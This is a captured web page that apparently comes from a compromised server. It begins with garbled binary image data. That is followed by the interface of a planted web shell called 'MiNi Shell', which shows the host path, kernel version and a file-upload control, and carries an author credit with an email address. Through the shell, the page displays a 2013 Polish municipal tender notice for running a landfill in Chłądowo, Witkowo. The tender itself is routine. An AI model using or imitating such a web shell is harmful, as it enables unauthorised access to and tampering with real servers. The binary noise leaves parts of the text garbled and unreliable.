JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131206/505136-N-2013.html

<p class="kh_header"><b>Witkowo: Zarządzanie Składowiskiem odpadów innych niż niebezpieczne i obojętne w Chłądowie, gmina Witkowo</b><br>
<b>Numer ogłoszenia: 505136 - 2013; data zamieszczenia: 06.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina i Miasto Witkowo , ul. Gnieźnieńska 1, 62-230 Witkowo, woj. wielkopolskie, tel. 061 4778194, faks 061 4778855.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.witkowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zarządzanie Składowiskiem odpadów innych niż niebezpieczne i obojętne w Chłądowie, gmina Witkowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zarządzanie Składowiskiem odpadów innych niż niebezpieczne i obojętne w Chłądowie, gmina Witkowo.
Składowisko odpadów zlokalizowane jest w m. Chłądowo i składa się z dwóch kwater. Pierwsza kwatera składowiska o powierzchni 1,4 ha i pojemności 30.900 m3 została już zapełniona i obecnie trwają prace rekultywacyjne tej kwatery, w ramach których zakończono rekultywację techniczną i przystąpiono do rekultywacji biologicznej. Druga kwatera składowiska o powierzchni 0,8 ha i pojemności 25.350 m3 obecnie jest eksploatowana. Całkowita powierzchnia składowiska wraz z towarzyszącą infrastrukturą techniczną wynosi
3 ha. W skład infrastruktury technicznej wchodzą: budynek socjalno - techniczny, garaż 
na sprzęt i maszyny, waga elektroniczna i budynek obsługi wagi, system komputerowy 
do ewidencji przyjmowanych odpadów, śluza dezynfekcyjna, kontener na odpady problemowe, zasieki na surowce wtórne, ogrodzenie wraz z siatkami zapobiegającymi rozwiewanie odpadów, wewnętrzne sieci energetyczne oraz wodociągowo - kanalizacyjne, wodociąg, instalacje do gromadzenia  i odprowadzania wód odciekowych i opadowych, drogi wewnętrzne i place, zieleń izolacyjna, 6 szt. studni odgazowujących, instalacja do spalania gazu składowiskowego (6 szt. pochodni do spalania gazu składowiskowego), pompy spalinowe i elektryczne,  3 szt. piezometrów. Ilość odpadów składowanych na składowisku 
w 2012 roku wyniosła ok. 2.350 Mg. Ilość odpadów przyjmowanych na składowisko w ciągu doby wynosi mniej niż 10 Mg.

2. Wykaz odpadów dopuszczonych do składowania na składowisku:
Lp	Kod odpadu	Rodzaj odpadu
1.	19 08 01 	Skratki
2.	19 08 02	Zawartość piaskowników
3.	19 08 05	Ustabilizowane komunalne osady ściekowe
4.	20 01 01	Papier i tektura
5.	20 01 02	Szkło
6.	20 01 08	Odpady kuchenne ulegające biodegradacji
7.	20 01 10	Odzież
8.	20 01 11	Tekstylia
9.	20 01 38	Drewno inne niż wymienione w 20 01 37
10.	20 01 39	Tworzywa sztuczne
11.	20 01 40	Metale
12.	20 01 99	Inne nie wymienione frakcje zbierane w sposób selektywny
13.	20 02 01	Odpady ulegające biodegradacji
14.	20 02 03	Inne odpady nie ulegające biodegradacji
15.	20 03 01	Niesegregowane (zmieszane) odpady komunalne
16.	20 03 02	Odpady z targowisk
17.	20 03 03	Odpady z czyszczenia ulic i placów
18.	20 03 06	Odpady ze studzienek kanalizacyjnych
19.	20 03 07	Odpady wielkogabarytowe
20.	20 03 99	Odpady komunalne nie wymienione w innych podgrupach
21.	19 12 12	Inne odpady (w tym zmieszane substancje i przedmioty) z mechanicznej obróbki odpadów inne niż wymienione w 19 12 11

3. Zarządzanie składowiskiem odpadów innych niż niebezpieczne i obojętne w Chłądowie będzie obejmować wypełnianie wszelkich obowiązków posiadacza odpadów wynikających 
z ustawy o odpadach z dnia 14 grudnia 2012 roku (Dz. U. z 2013 roku poz. 21), ustawy z dnia 27 kwietnia 2001 roku Prawo ochrony środowiska (t. j. Dz. U. z 2013 r., poz. 1232), przepisów wykonawczych do w/w ustaw oraz wydanych i obowiązujących decyzji tj.:
a) decyzji Starosty Gnieźnieńskiego Nr OS.6236.2.2011 z dnia 30 marca 2012 roku zatwierdzającej instrukcję eksploatacji składowiska odpadów na składowisku odpadów innych niż niebezpieczne i obojętne w Chłądowie, zmienionej decyzją Starosty Gnieźnieńskiego z dnia 12 grudnia 2012 roku,
b) decyzji Starosty Gnieźnieńskiego Nr OS 7610/26/2009 z dnia 16 marca 2009 roku zezwalającej na odzysk i unieszkodliwianie odpadów na składowisku odpadów innych
niż niebezpieczne i obojętne w Chłądowie, zmienionej decyzjami Starosty Gnieźnieńskiego Nr OS.6233.5.2012 z dnia 30 marca 2012 roku, Nr OS.6233.5.2012 z dnia 28 czerwca 
2012 roku i Nr OS.6233.28.2013 z dnia 14 listopada 2013roku,
c) decyzji Starosty Gnieźnieńskiego Nr OS.6233.46.2012 z dnia 7 stycznia 2013 roku zezwalającej na odzysk odpadów na terenie składowiska odpadów innych niż niebezpieczne 
i obojętne w Chłądowie,
d) decyzji Starosty Gnieźnieńskiego Nr OS.6236.2.2012 z dnia 3 lipca 2012 roku 
na zgodę na zamknięcie wydzielonej części składowiska odpadów komunalnych - kwatery 
nr 1 w m. Chłądowo, zmienionej decyzją z dnia 7 stycznia 2013 roku,
e) decyzji - pozwolenia wodnoprawnego wydanego przez Starostę Gnieźnieńskiego
Nr OS.6224-18/2010 z dnia 1 września 2010 roku.

4. W ramach zamówienia Wykonawca zobowiązuje się w szczególności do:
a) przyjmowania w okresie obowiązywania umowy o zarządzaniu składowiskiem,
od poniedziałku do piątku, z wyłączeniem dni wolnych od pracy, w godzinach
od 7.00 do 15.00 odpadów dopuszczonych do unieszkodliwiania poprzez składowanie
od podmiotów gospodarczych posiadających stosowne zezwolenia na transport odpadów
w ilości do 7.101 Mg rocznie.
W razie konieczności Wykonawca będzie przyjmował odpady również w soboty,
w miesiącach lipcu i sierpniu od godz. 10.00 do 13.00, tylko po wcześniejszym zgłoszeniu telefonicznym. W/w zgłoszenia będą przyjmowane od poniedziałku do piątku w godzinach pracy składowiska. 
b) formowania i ugniatania (kompaktorem o masie co najmniej 30 Mg) odpadów dostarczanych na składowisko oraz przedzielanie warstw składowanych odpadów warstwami izolacyjnymi, zgodnie z przepisami prawa w tym zakresie,
c) prowadzenia ewidencji ilościowych i jakościowych przyjmowanych odpadów oraz wymaganej dokumentacji w tym zakresie,
d) prowadzenia dozoru terenu składowiska wraz z infrastrukturą towarzyszącą,
e) prowadzenia monitoringu składowiska zgodnie z Rozporządzeniem Ministra Środowiska 
z dnia 30 kwietnia 2013 roku (Dz. U. z 2013 roku, poz. 523) w sprawie składowisk odpadów 
i przekazywania jego wyników Zamawiającemu oraz właściwym organom i instytucjom,
f) sporządzania i przekazywania Zamawiającemu, w terminie do 10 dnia każdego miesiąca 
za poprzedni miesiąc, comiesięcznych sprawozdań obejmujących ilość i rodzaj dostarczanych odpadów oraz miejsc ich pochodzenia,
g) sporządzania i przekazywania do Zamawiającego oraz odpowiednich instytucji, 
w określonych przepisami prawa terminach, sprawozdań wymaganych przepisami wynikających z ustawy o odpadach z dnia 14 grudnia 2012 roku (Dz. U. z 2013 roku, 
poz. 21), ustawy z dnia 27 kwietnia 2001 roku Prawo ochrony środowiska (t. j. Dz. U. 
z 2013 roku, poz. 1232), przepisów wykonawczych do w/w ustaw oraz na wniosek właściwych instytucji w zakresie składowiska odpadów,
h) przyjmowania opłat za dostarczane odpady w wysokościach określonych w uchwale
Nr XII/104/2011 Rady Miejskiej w Witkowie z dnia 28 grudnia 2011 roku w sprawie ustalenia ceny za przyjmowanie odpadów na składowisku odpadów innych niż niebezpieczne i obojętne w Chłądowie, zgodnie z w/w uchwałą cena za przyjmowanie odpadów
na składowisku wynosi 167,00 zł + podatek VAT za 1 Mg odpadów,
i) utworzenia i prowadzenia funduszu rekultywacyjnego, zgodnie z przepisami ustawy
z dnia 14 grudnia 2012 roku (Dz. U. z 2013 roku, poz. 21) oraz przekazywania na ten  fundusz, w terminach określonych w umowie o zarządzaniu składowiskiem odpadów, kwoty w wysokości 20,00 zł od każdej 1 przyjętej do składowania tony odpadów, po zakończeniu umowy należy przekazać środki zgromadzone na tym funduszu nowemu zarządzającemu składowiskiem odpadów, Wykonawca udzieli pełnomocnictwa Zamawiającemu do wglądu  
w fundusz rekultywacyjny,
j) przekazywania informacji i wnoszenia opłat z tytułu korzystania ze środowiska 
za składowanie odpadów na rachunek Urzędu Marszałkowskiego w Poznaniu w terminach 
i kwotach określonych w przepisach prawa oraz przekazywanie Zamawiającemu potwierdzenia złożenia informacji i wniesienia powyższej opłaty w terminie 10 dni 
po obowiązku przekazania informacji i wniesienia opłat do Urzędu Marszałkowskiego,
k) przekazywania na konto Zamawiającego, w terminie określonym w umowie 
o zarządzaniu składowiskiem odpadów, kwoty określonej w § 4 ust. 8 pomniejszonej o kwoty określone w § 4 ust. 9 i 10,
l) przeciwdziałania powstawaniu zagrożeń (pożarów, nadmiernych emisji odorów itp.),
ł) rozdeszczowaniu powstających wód odciekowych na zdeponowane już odpady, 
w przypadku nagromadzenia odcieków w ilości zagrażającej wydostania się ich poza nieckę składowiska, Wykonawca będzie zobowiązany do ich zagospodarowania zgodnie 
z pozwoleniem wodnoprawnym wydanym przez Starostę Gnieźnieńskiego Nr OS.6224-18/2010 z dnia 1 września 2010 roku,
m) ponoszenia kosztów związanych z wykorzystaniem wody oraz energii elektrycznej niezbędnej do bieżącej eksploatacji i zarządzania składowiskiem,
n) bieżącego utrzymywania porządku na terenie składowiska odpadów poprzez zbieranie odpadów przedostających się poza teren kwater składowiska, właściwe utrzymywanie terenu wokół składowiska poprzez pielęgnację terenów zieleni (koszenie trawy, pielęgnacja drzew 
i krzewów stanowiących zieleń izolacyjną), utrzymywanie budynków, wszelkich urządzeń infrastruktury technicznej, ogrodzeń we właściwym stanie technicznym,
o) kontynuowania rekultywacji kwatery nr 1 składowiska odpadów, zgodnie z decyzją Starosty Gnieźnieńskiego Nr OS.6236.2.2012 z dnia 3 lipca 2012 roku na zgodę
na zamknięcie wydzielonej części składowiska odpadów komunalnych - kwatery
nr 1 w m. Chłądowo, zmienionej decyzją z dnia 7 stycznia 2013 roku,
p) po podpisaniu umowy o zarządzaniu składowiskiem, a przed rozpoczęciem zarządzania składowiskiem Wykonawca zobowiązany jest do przeniesienia na siebie praw i obowiązków wynikających z decyzji:
- decyzji Starosty Gnieźnieńskiego Nr OS.6236.2.2011 z dnia 30 marca 2012 roku zatwierdzającej instrukcję eksploatacji składowiska odpadów na składowisku odpadów innych niż niebezpieczne i obojętne w Chłądowie, zmienionej decyzją Starosty Gnieźnieńskiego z dnia 12 grudnia 2012 roku,
- decyzji Starosty Gnieźnieńskiego Nr OS.6236.2.2012 z dnia 3 lipca 2012 roku na zgodę
na zamknięcie wydzielonej części składowiska odpadów komunalnych - kwatery
nr 1 w m. Chłądowo, zmienionej decyzją z dnia 7 stycznia 2013 roku,
r) uzyskania tytułu prawnego do dysponowania całą nieruchomością, na której jest zlokalizowane składowisko odpadów (Zamawiający przekaże do dysponowania przedmiotową nieruchomość na podstawie umowy użyczenia),
s) ustanowienia zabezpieczenia roszczeń, zgodnie z art. 125 ustawy z dnia 14 grudnia
2012 roku o odpadach (Dz. U. z 2013 roku, poz. 21),
t) złożenia wniosku o wydanie decyzji zatwierdzającej instrukcję prowadzenia składowiska odpadów w terminie dwóch lat od dnia wejścia w życie ustawy z dnia 14 grudnia 2012 roku 
o odpadach (Dz. U. z 2013 roku, poz. 21),
u) udostępnienia wszelkiej dokumentacji i informacji Zamawiającemu w zakresie zarządzania składowiskiem odpadów,
w) wypełnianie pozostałych obowiązków w zakresie zarządzania składowiskiem określonych w przepisach prawa,
z) Wykonawca zapewnia w czasie trwania umowy obsługę personalną i obsługę techniczną
na powierzonym  terenie, sprzętem własnym lub pozyskanym własnymi staraniami.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.53.10.00-8, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku udziału w postępowaniu należy załączyć oświadczenie
o spełnianiu warunków udziału w postępowaniu, stanowiące zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę realizacji co najmniej 1 usługi w zakresie zarządzania składowiskiem odpadów w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, która trwała przez min. 12 miesięcy oraz wykazanie, że Wykonawca uiścił opłatę marszałkowską za korzystanie ze środowiska za kwotę min. 300.000,00 zł w ciągu roku. W celu spełnienia warunku udziału w postępowaniu należy załączyć: załącznik nr 6 do SIWZ - Doświadczenie zawodowe wykonawcy oraz poświadczenie, z tym że w odniesieniu  do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert (przykładowe dokumenty do poświadczenia spełnienia niniejszego warunku: dla zarządzania składowiskiem - dokument potwierdzający realizację usługi np. referencje, dla opłaty marszałkowskiej np. sprawozdanie)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę, że dysponuje: 
- co najmniej jedną osobą posiadającą  świadectwo stwierdzające kwalifikacje w zakresie gospodarowania odpadami - kierownik składowiska odpadów, 
- co najmniej jedną osobą posiadającą uprawnienia w zakresie operatora kompaktora.
W celu spełnienia warunku wykonawca ma obowiązek załączyć stosowne oświadczenie
o dysponowaniu w/w osobami - zgodnie z załącznikiem nr 5 do SIWZ - Wykaz osób/ oświadczenie o dysponowaniu osobami</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień umowy może nastąpić w formie pisemnej przy zachowaniu wymogów z art. 144 ust. 1 ustawy z dn. 29 stycznia 2004 Prawo zamówień publicznych (t. j. Dz. U. Nr 113 poz. 759 ze zm.) zgodnie ze specyfikacją istotnych warunków zamówienia.
2. Zmiana postanowień umowy zgodnie z zapisem art. 144 ust. 1 może dotyczyć:
1) terminu zakończenia realizacji umowy - tylko w uzasadnionych przypadkach na podstawie uzgodnień z Zamawiającym wynikających ze:
a) zmiany przepisów prawnych, pozwoleń i uzgodnień. 
b) działań osób trzecich lub organów władzy publicznej, które spowodują przerwanie, realizacji zamówienia,
c) zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy.
2) nieprzewidzianych okoliczności formalno-prawnych,
3) zmiany osób - kierownika składowiska, operatora kompaktora - tylko w uzgodnieniu 
i po otrzymaniu akceptacji Zamawiającego 
4) terminu płatności faktur, 
5) terminów, o których mowa w § 5 i 6 niniejszej umowy, 
6) zmiany stawki VAT - w takim wypadku wartość brutto zmieni się odpowiednio,
7) sposobu rozliczania płatności,
8) zwiększenia wysokości wynagrodzenie, o którym mowa w § 6 ust. 3 umowy w przypadku, gdy ilość odebranych odpadów będzie większa niż podana przez Zamawiającego ilość szacunkowa,
9) zmiany treści umowy w przypadku zmiany uzgodnień, decyzji, uchwał podanych 
w umowie,
10) zmiany przepisów prawnych w zakresie związanym z wykonaniem niniejszej umowy,
11) zmiany sposobu albo terminu uiszczania opłaty za korzystanie ze środowiska,
12) innych ważnych powodów.
3. Wykonawca zobowiązuje się niezwłocznie poinformować Zamawiającego o zaistnieniu przesłanek stanowiących potrzebę zmiany umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.witkowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta Witkowo,
ul. Gnieźnieńska 1,
62-230 Witkowo,
pok. nr 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2013 godzina 12:30, miejsce: Urząd Gminy i Miasta Witkowo,
ul. Gnieźnieńska 1,
62-230 Witkowo,
pok. nr 21 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com